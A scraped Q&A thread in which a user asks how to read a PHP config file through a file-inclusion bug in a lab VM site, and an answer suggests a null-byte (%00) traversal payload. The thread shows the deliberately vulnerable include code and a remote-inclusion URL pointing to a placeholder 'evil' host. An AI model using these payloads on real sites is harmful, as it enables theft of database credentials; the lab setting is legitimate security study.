PHP security exploit - list content of remote PHP file?
Use a directory traversal and end your input string with a %00
NUL meta character (as mentioned on wikipedia).
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
swiftcode
Software engineer, mostly focusing on the awesome iOS world of development.
Updated on April 29, 2020Comments
-
swiftcode about 4 years
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named
setupreset.php
which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).This is the code of index.php, for reference:
<?php include ("includes/header.php"); // Grab inputs $page = $_GET[page]; if ($page=="") { include("home.html"); } else { include ($page . '.php'); } include ("includes/footer.php"); ?>
The main goal is to list the contents of the
setupreset
PHP file, or download it somehow. If I navigate to this file:http://10.211.55.5/index.php?page=setupreset
, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.Now, the website uses PHP
include
s, so URLs look like this:http://10.211.55.5/index.php?page=products
. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g.http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php
butallow_url_include
isoff
and cannot be changed, so this won't work (I tried this). However,allow_url_fopen
is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content ofsetupreset.php
using this kind of exploit? -
swiftcode over 10 yearsYes, that would be easy, but unfortunately I can't change the source code of the file unless it's by some form of exploit.
-
Emilio Gort over 10 years@evert could you explain...making file_get_content(), i just get the html